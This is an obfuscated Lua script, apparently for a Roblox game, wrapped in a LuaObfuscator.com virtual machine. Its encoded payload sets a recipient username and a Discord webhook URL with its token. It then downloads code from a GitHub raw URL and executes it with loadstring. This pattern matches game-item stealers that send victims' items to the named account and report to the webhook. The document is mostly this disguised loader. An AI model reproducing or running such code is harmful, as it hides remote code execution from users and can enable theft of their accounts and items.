--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v73=(1637 -(1523 + 114)) -0 ;local v74;while true do if (v73==0) then v74=(v31/((2 + 0)^(v32-(2 -(1 -0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v74-(v74%(569 -(367 + 201))) ;end end else local v75=(929 -((1279 -(68 + 997)) + 713))^(v32-(1 + (1270 -(226 + 1044)))) ;return (((v31%(v75 + v75))>=v75) and (1 + 0)) or (877 -((1227 -945) + (712 -(32 + 85)))) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;return (v37 * (16778173 -(892 + 65))) + (v36 * (121138 -55602)) + (v35 * (610 -354)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if ((1641 -(195 + 1442))~=v38) then else while true do if (v39~=0) then else local v98=0;while true do if (v98==(0 -0)) then v40=0 + 0 ;v41=nil;v98=1 + 0 ;end if (1==v98) then v39=1;break;end end end if (v39==(398 -(115 + 281))) then local v99=0;while true do if (0==v99) then v44=nil;v45=nil;v99=2 -1 ;end if (v99==1) then v39=3 + 0 ;break;end end end if ((7 -4)~=v39) then else v46=nil;while true do local v101=0 -0 ;while true do if (v101==0) then if (v40==(868 -(550 + 317))) then local v103=0;local v104;while true do if (v103==(0 -0)) then v104=0;while true do if (v104==(0 -0)) then local v139=0;while true do if (v139==0) then v45=v24();v46={};v139=1;end if (v139~=1) then else v104=1;break;end end end if (v104==1) then for v143=1,v45 do local v144=0 -0 ;local v145;local v146;local v147;while true do if ((286 -(134 + 151))==v144) then v147=nil;while true do if (v145==(1666 -(970 + 695))) then if (v146==(1 -0)) then v147=v22()~=(1990 -(582 + 1408)) ;elseif (v146==2) then v147=v25();elseif (v146==(10 -7)) then v147=v26();end v46[v143]=v147;break;end if (v145~=0) then else local v165=0 -0 ;local v166;while true do if (v165==(0 -0)) then v166=0;while true do if (v166~=1) then else v145=1;break;end if ((1824 -(1195 + 629))==v166) then local v175=0 -0 ;while true do if (v175==(241 -(187 + 54))) then v146=v22();v147=nil;v175=1;end if (v175==1) then v166=1;break;end end end end break;end end end end break;end if (v144~=(780 -(162 + 618))) then else local v158=0 + 0 ;while true do if (v158==(0 + 0)) then v145=0;v146=nil;v158=1 -0 ;end if (v158~=(1 -0)) then else v144=1;break;end end end end end v44[1 + 2 ]=v22();v104=2;end if (v104==(1638 -(1373 + 263))) then v40=2;break;end end break;end end end if (v40==(1002 -(451 + 549))) then local v105=0 + 0 ;while true do if (v105~=1) then else for v126=1,v24() do v43[v126]=v24();end return v44;end if (v105==(0 -0)) then for v128=1,v24() do local v129=0 -0 ;local v130;local v131;local v132;local v133;while true do if (v129==1) then v132=nil;v133=nil;v129=2;end if (v129==(1384 -(746 + 638))) then v130=0;v131=nil;v129=1 + 0 ;end if (2==v129) then while true do if (v130==(0 -0)) then local v159=0;while true do if (v159~=(341 -(218 + 123))) then else v131=1581 -(1535 + 46) ;v132=nil;v159=1 + 0 ;end if (v159~=1) then else v130=1;break;end end end if (v130~=1) then else v133=nil;while true do if (v131==1) then while true do if (v132==(0 + 0)) then v133=v22();if (v21(v133,561 -(306 + 254) ,1 + 0 )==(0 -0)) then local v170=0;local v171;local v172;local v173;local v174;while true do if (v170~=0) then else local v176=0;while true do if (v176~=(1468 -(899 + 568))) then else v170=1;break;end if (v176~=0) then else v171=0;v172=nil;v176=1;end end end if (v170==(1 + 0)) then v173=nil;v174=nil;v170=2;end if (v170==2) then while true do if (v171~=0) then else local v177=0 -0 ;local v178;while true do if (v177~=(603 -(268 + 335))) then else v178=290 -(60 + 230) ;while true do if (1~=v178) then else v171=1;break;end if (v178~=0) then else local v189=0;while true do if (v189==1) then v178=1;break;end if (v189==(572 -(426 + 146))) then v172=v21(v133,1 + 1 ,3);v173=v21(v133,4,6);v189=1;end end end end break;end end end if (v171==(1458 -(282 + 1174))) then if (v21(v173,1,812 -(569 + 242) )==(2 -1)) then v174[1 + 1 ]=v46[v174[1026 -(706 + 318) ]];end if (v21(v173,2,1253 -(721 + 530) )~=(1272 -(945 + 326))) then else v174[3]=v46[v174[3]];end v171=7 -4 ;end if (v171~=3) then else if (v21(v173,3,3 + 0 )~=(701 -(271 + 429))) then else v174[4 + 0 ]=v46[v174[4]];end v41[v128]=v174;break;end if (v171==1) then local v180=0;while true do if (v180==(1501 -(1408 + 92))) then v171=2;break;end if (v180==(1086 -(461 + 625))) then v174={v23(),v23(),nil,nil};if (v172==(0 + 0)) then local v187=0;local v188;while true do if ((0 + 0)==v187) then v188=0 + 0 ;while true do if ((0 + 0)==v188) then v174[3]=v23();v174[4]=v23();break;end end break;end end elseif (v172==1) then v174[3]=v24();elseif (v172==2) then v174[3]=v24() -(2^16) ;elseif (v172~=3) then else local v194=529 -(406 + 123) ;local v195;local v196;local v197;while true do if (v194~=(1770 -(1749 + 20))) then else v197=nil;while true do if (v195==(1 + 0)) then while true do if ((1322 -(1249 + 73))==v196) then v197=0 + 0 ;while true do if (v197==0) then v174[1148 -(466 + 679) ]=v24() -((4 -2)^16) ;v174[4]=v23();break;end end break;end end break;end if (v195~=0) then else local v198=0;while true do if (v198==(0 -0)) then v196=1900 -(106 + 1794) ;v197=nil;v198=1;end if (v198~=(1 + 0)) then else v195=1;break;end end end end break;end if (0~=v194) then else v195=0;v196=nil;v194=1 + 0 ;end end end v180=2 -1 ;end end end end break;end end end break;end end break;end if (0==v131) then local v167=0 -0 ;while true do if (0==v167) then v132=0;v133=nil;v167=115 -(4 + 110) ;end if (v167==(585 -(57 + 527))) then v131=1428 -(41 + 1386) ;break;end end end end break;end end break;end end end for v134=104 -(17 + 86) ,v24() do v42[v134-(1 + 0) ]=v29();end v105=1;end end end v101=1 -0 ;end if (v101~=1) then else if (v40==(0 -0)) then local v106=0;while true do if (1~=v106) then else v43={};v44={v41,v42,nil,v43};v106=2;end if (v106==0) then v41={};v42={};v106=3 -2 ;end if (v106~=(2 + 0)) then else v40=1;break;end end end break;end end end break;end if (v39==1) then local v100=0 + 0 ;while true do if (v100==1) then v39=3 -1 ;break;end if (v100==0) then v42=nil;v43=nil;v100=1;end end end end break;end if (v38==(66 -(30 + 35))) then v41=nil;v42=nil;v38=2;end if (v38~=2) then else v43=nil;v44=nil;v38=3;end if (v38==0) then v39=0;v40=nil;v38=1 + 0 ;end if (v38~=3) then else v45=nil;v46=nil;v38=4;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1258 -(1043 + 214) ;local v50=(v21(v48,1 + 0 ,75 -55 ) * (2^(1244 -(323 + 889)))) + v47 ;local v51=v21(v48,56 -(18 + 17) ,611 -(361 + 219) );local v52=((v21(v48,32)==(321 -(53 + 267))) and  -(1 + 0)) or (414 -(15 + 144 + 254)) ;if (v51==0) then if (v50==0) then return v52 * (982 -((47 -29) + 964)) ;else local v92=0 -0 ;while true do if (v92==(0 + 0)) then v51=1 + 0 ;v49=850 -(20 + 830) ;break;end end end elseif (v51==(5247 -3200)) then return ((v50==(0 + 0)) and (v52 * (((1678 -(1126 + 425)) -(116 + 10))/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(1761 -(542 + 196)) ) * (v49 + (v50/(2^(110 -58)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(405 -(118 + 287))) then return "";end end v54=v3(v16,v19,(v19 + v53) -(3 -2) );v19=v19 + v53 ;local v55={};for v66=1122 -(118 + 1003) , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (5 -3) );v19=v19 + (379 -(142 + 235)) ;return (v58 * (1161 -905)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v76=0;while true do if (v76==0) then v20=v0(v3(v59,1,1));return "";end end else local v77=v2(v0(v59,16));if v20 then local v93=v5(v77,v20);v20=nil;return v93;else return v77;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v78=v63;local v79=v64;local v80=v65;local v81=v28;local v82={};local v83={};local v84={};for v88=0 + 0 ,v71 do if (((4511 -2882)>(92 + 1110)) and (v88>=v80)) then v82[v88-v80 ]=v70[v88 + (978 -(553 + 424)) ];else v84[v88]=v70[v88 + (1 -0) ];end end local v85=(v71-v80) + 1 + 0 ;local v86;local v87;while true do local v89=0 + 0 ;local v90;while true do if (((587 + 421)<(1578 + 2133)) and (v89==(0 + 0))) then v90=(0 + 0) -0 ;while true do if ((v90==(2 -1)) or ((2348 -1299)<=(264 + 642))) then if (((21809 -17296)>(3479 -(239 + 514))) and (v87<=(2 + 1))) then if ((v87<=(1887 -(927 + 959))) or ((4992 -(3246 + 265))>=(3987 -(797 + 532)))) then if ((v87>(0 + 0)) or ((1087 + 2133)==((5585 -4124) -(11 + 86)))) then local v109=(551 -(83 + 468)) -(1806 -(1202 + 604)) ;local v110;local v111;local v112;while true do if ((v109==(1202 -(373 + 829))) or ((1785 -(476 + 255))>(4522 -(369 + 761)))) then v110=0 -(0 -0) ;v111=nil;v109=1 + 0 ;end if ((v109==(1 -(0 -0))) or ((1280 -604)>=(1880 -((177 -113) + 174)))) then v112=nil;while true do if (((2871 + 1265)>(342 + 2055)) and (v110==(1 -0))) then while true do if ((v111==(336 -(144 + 192))) or ((4550 -(42 + 174))==(3189 + 1056))) then v112=v86[2 + (325 -(45 + 280)) ];v84[v112]=v84[v112](v13(v84,v112 + 1 + 0 ,v69));break;end end break;end if ((v110==(0 + 0)) or ((5780 -(351 + 12 + 1141))<=(4611 -(1183 + 397)))) then local v152=0 -0 ;while true do if (((1 + 0)==v152) or ((3124 + 451 + 441 + 766)<=(3174 -(1059 + 854 + 62)))) then v110=1 + 0 ;break;end if ((v152==(0 -0)) or (((2265 + 10611) -8012)<(2308 -(183 + 223)))) then v111=1933 -(565 + 1368) ;v112=nil;v152=(5 -2) -2 ;end end end end break;end end else v84[v86[1663 -(1477 + 184) ]][v86[3 -0 ]]=v86[4 + 0 ];end elseif (((5695 -(564 + 292))>=(6384 -2684)) and (v87==(5 -3))) then local v115=304 -(244 + (1971 -(340 + 1571))) ;local v116;local v117;local v118;local v119;while true do if ((v115==(0 + 0)) or ((1551 -(41 + 172 + 263))>(2919 -(938 + 63)))) then local v141=0 + 0 ;while true do if (((1521 -(936 + 189))<=(7291 -(5259 -(1733 + 39)))) and ((0 -0)==v141)) then v116=v86[2];v117,v118=v81(v84[v116](v13(v84,v116 + 1 + 0 ,v86[1616 -(1565 + 48) ])));v141=1 + 0 ;end if ((v141==(1139 -(782 + 356))) or (4169==((3488 -(125 + 909)) -(176 + 91)))) then v115=(1950 -(1096 + 852)) -1 ;break;end end end if (((2071 -665)==(2498 -(975 + 117))) and (v115==(1876 -(157 + 1718)))) then local v142=0 + 0 + 0 ;while true do if (((5434 -3903)<(11151 -6880)) and (v142==(0 + 0))) then v69=(v118 + v116) -(3 -2) ;v119=1018 -(697 + 321) ;v142=2 -1 ;end if (((1345 -710)==(1463 -828)) and (v142==(1 + 0))) then v115=3 -(1 -0) ;break;end end end if (((9041 -5668)<=(4783 -(322 + 905))) and (v115==(613 -(602 + 9)))) then for v148=v116,v69 do local v149=(1154 + 35) -(449 + 740) ;local v150;local v151;while true do if ((v149==(0 -0)) or ((3796 -(351 + 154))<(4854 -(1281 + 293)))) then v150=872 -(826 + 46) ;v151=nil;v149=948 -(245 + 702) ;end if ((((6457 -(409 + 103)) -(1381 + 178))>=873) and (v149==((237 -(46 + 190)) + 0))) then while true do if (((2910 -1989)<=(355 + 747)) and (v150==(0 -0))) then v151=1898 -(260 + 1638) ;while true do if (((5146 -(382 + (153 -(51 + 44))))>=963) and (v151==(470 -(381 + 89)))) then v119=v119 + (3 -2) ;v84[v148]=v117[v119];break;end end break;end end break;end end end break;end end else local v120=0 + 0 ;local v121;local v122;local v123;while true do if (((0 -(0 + 0))==v120) or ((2853 -1893)<=(1500 -624))) then v121=(2522 -(1114 + 203)) -(902 + 303) ;v122=nil;v120=(727 -(228 + 498)) -0 ;end if (((1 -0)==v120) or ((4975 -2909)==(18 + 63 + 851))) then v123=nil;while true do if (((6515 -(1121 + 569))<(1997 + 2846)) and (v121==(0 + 0))) then local v154=0 + 0 ;while true do if (((3 -2)==v154) or ((4091 -(22 + 192))>=(5220 -(483 + 200)))) then v121=1464 -(1404 + 59) ;break;end if ((v154==(0 -0)) or (4315<(2319 -593))) then v122=v86[767 -(259 + 209 + 297) ];v123=v84[v86[565 -(334 + 228) ]];v154=1 + 0 ;end end end if (((3 -2)==v121) or ((12409 -8730)<(2619 -(109 + 1885)))) then v84[v122 + (2 -1) ]=v123;v84[v122]=v123[v86[6 -(665 -(174 + 489)) ]];break;end end break;end end end elseif ((v87<=(2 + (7 -4))) or (((6766 -(830 + 1075)) -(141 + 95))<(621 + 11))) then if ((v87==(9 -5)) or ((199 -116)>(417 + 1363))) then v84[v86[2 + 0 ]]=v86[1 + 2 ];else do return;end end elseif (((1495 -949)<=(2996 -1919)) and (v87<=(5 + (525 -(303 + 221))))) then v84[v86[2 + 0 ]]();elseif ((v87==(3 + 4)) or ((406 + 590)>(3548 + (2022 -(231 + 1038))))) then v84[v86[(2 + 0) -0 ]]=v62[v86[2 + 1 ]];else v84[v86[(1327 -(171 + 991)) -(92 + 71) ]]=v86[2 + 1 ]~=(0 -0) ;end v68=v68 + (766 -(574 + 191)) ;break;end if (((19761 -(64665 -48974))>(2306 -(1427 + 192))) and (v90==(0 + (0 -0)))) then local v102=0 + 0 ;while true do if ((v102==(0 -(0 -0))) or (656>=(1701 + 1629))) then v86=v78[v68];v87=v86[2 -1 ];v102=(681 + 169) -(254 + 595) ;end if ((v102==(1 + 0)) or ((2618 -(55 + 71))<=(1611 -(316 + 960)))) then v90=1 -(0 -0) ;break;end end end end break;end end end end A,B=v28(v11(v72));if  not A[1] then local v91=v60[4][v68] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030B3O00546568507563756B5F2O3503093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303332363430342O3230333735302O34312F396D57494F3043505A4C4368762D4A51344A54667A625A4E36665A486A3955726B6C596673365A4658506158562O7562687A59684B5A5854427064457138546943653466030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53757065724D6F6E7A2F5073785F53632F6D61696E2F4D6F6E7A5072656D69756D000F3O0012073O00013O00304O000200030012073O00013O00304O000400030012073O00013O00304O000500060012073O00073O001207000100083O0020030001000100090012040003000A4O0008000400014O0002000100044O00015O00022O00063O000100012O00053O00017O000F3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
